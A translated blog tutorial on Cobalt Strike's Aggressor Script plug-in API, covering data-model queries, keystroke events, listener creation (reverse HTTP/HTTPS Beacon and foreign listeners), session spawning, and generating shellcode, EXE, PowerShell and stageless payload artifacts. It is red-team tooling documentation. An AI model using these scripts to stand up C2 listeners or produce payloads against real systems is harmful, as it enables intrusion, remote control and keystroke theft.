Cobalt Strike plug-in development official guide, part 2

Posted by trammel at 2020-04-01

Translation + Practice

Original address:

0x03 Data model

Cobalt Strike's team server stores all host, service, credential and other collected information.


Data API

The Cobalt Strike data model can be queried with the &data_query function. This function accesses all of the state and information the Cobalt Strike client maintains. A second function, &data_keys, lists the keys (models) that can be queried. Demo:

    command export {
        local('$handle $model $row $entry $index');
        $handle = openf(">export.txt");
        foreach $model (data_keys()) {
            println($handle, "== $model ==");
            println($handle, data_query($model));
        }
        closef($handle);
        println("See export.txt for the data.");
    }

Cobalt Strike provides a number of convenience functions so that the data model can be used more intuitively.


Calling one of these functions returns an array with one entry per row of the model; each row is a dictionary of keys and their values.

The easiest way to understand this is to experiment directly in the Script Console; the x command, which evaluates an expression and prints the result, exists for exactly this purpose. See the figure:

(Figure not reproduced here; it shows basic array operations on the returned rows.)

Use on with a data key to react to changes in the data model:

    on keystrokes {
        println("I have new keystrokes: $1");
    }

0x04 Listeners

Listeners are the core Cobalt Strike module for handling the traffic sent back by Beacons.


Listener API

Aggressor Script collects listener information from every team server the client is connected to. The advantage of this is that a session can easily be passed to another team server. To get a list of all listener names, use the &listeners function; to get only the local team server's listeners, use &listeners_local. The &listener_info function resolves a listener name to its configuration. Demo:

    command listeners {
        local('$name $key $value');
        foreach $name (listeners()) {
            println("== $name == ");
            foreach $key => $value (listener_info($name)) {
                println("$[20]key : $value");
            }
        }
    }
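As an added example (not code from the guide or from Cobalt Strike's own documentation), the listener and data model functions above can be combined into an engagement audit command that writes a timestamped snapshot to disk, so the operator's listener configuration and collected state at a given moment are on record. It assumes Sleep's &formatDate and Aggressor's "ready" event, neither of which this page shows.

```sleep
# Added example: snapshot listener configuration and the data model
# into a timestamped audit file for engagement record-keeping.
# Assumption: Sleep's &formatDate and the Aggressor "ready" event
# exist as used here; the other functions are those from the guide.
sub audit_snapshot {
    local('$handle $name $key $value $model $stamp');
    $stamp = formatDate("yyyyMMdd-HHmmss");
    $handle = openf(">audit-" . $stamp . ".txt");

    # one section per listener, one line per configuration key
    println($handle, "# listener snapshot " . $stamp);
    foreach $name (listeners()) {
        println($handle, "== $name ==");
        foreach $key => $value (listener_info($name)) {
            println($handle, "$[20]key : $value");
        }
    }

    # then every model the client tracks, as &data_query returns it
    println($handle, "# data model snapshot");
    foreach $model (data_keys()) {
        println($handle, "== $model ==");
        println($handle, data_query($model));
    }
    closef($handle);
    return $stamp;
}

# Script Console command: type "audit" to write a snapshot on demand
command audit {
    println("Wrote audit-" . audit_snapshot() . ".txt");
}

# also write one automatically once the client has finished connecting
on ready {
    audit_snapshot();
}
```

The file is written in the client's working directory; the listener section is the same key/value listing the listeners command above prints to the console.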

Listener creation

Use the &listener_create function. Demo:

    # create a foreign listener
    listener_create("My Metasploit", "windows/foreign_https/reverse_https", "", 443);
    # create an HTTP Beacon listener
    listener_create("Beacon HTTP", "windows/beacon_http/reverse_http", "", 80, ",");

Listener deletion

Use the &listener_delete function. It takes a single argument: the name of the listener.

    listener_delete("Beacon HTTP");

(It's embarrassing: I don't know whether it's an official bug or the Chinese version. It runs normally inside a script; if you paste it into the console, it's GG.)

Listener selection

&openPayloadHelper pops up a list of the currently available listeners for the user to choose from. After the user picks one, the callback function runs with the chosen listener name. Demo:

    item "&Spawn" {
        openPayloadHelper(lambda({
            binput($bids, "spawn $1");
            bspawn($bids, $1);
        }, $bids => $1));
    }

Shellcode generation

Use &shellcode to generate shellcode for the listener with the given name.

    $data = shellcode("my listener", false, "x86");
    $handle = openf(">out.bin");
    writeb($handle, $data);
    closef($handle);

The &artifact function is called the same way:

    artifact("my listener", "exe", false, "x86");

Compared with shellcode generation, only the second parameter is added: the type of Beacon artifact to generate. Seven types are available:

A small demo I wrote myself:

    popup beacon_bottom {
        item "exe" {
            $data = artifact("cat", "exe");
            $handle = openf(">cat.exe");
            writeb($handle, $data);
            closef($handle);
        }
    }

Only two parameters are passed because the other two default to false and x86; they can be omitted if you don't need them.


The function is &powershell. Usage:

    println(powershell("my listener", false, "x86"));

It is exactly the same as shellcode. (It was originally a subset of shellcode; I don't know why the official docs list it separately.)


The function is &artifact_stageless. Demo:

    sub ready {
        local('$handle');
        $handle = openf(">out.exe");
        writeb($handle, $1);
        closef($handle);
    }

    artifact_stageless("my listener", "exe", "x86", "", &ready);

Compared with the EXE/DLL artifact, the extra parameter is the proxy configuration string (the fourth argument); everything else is the same.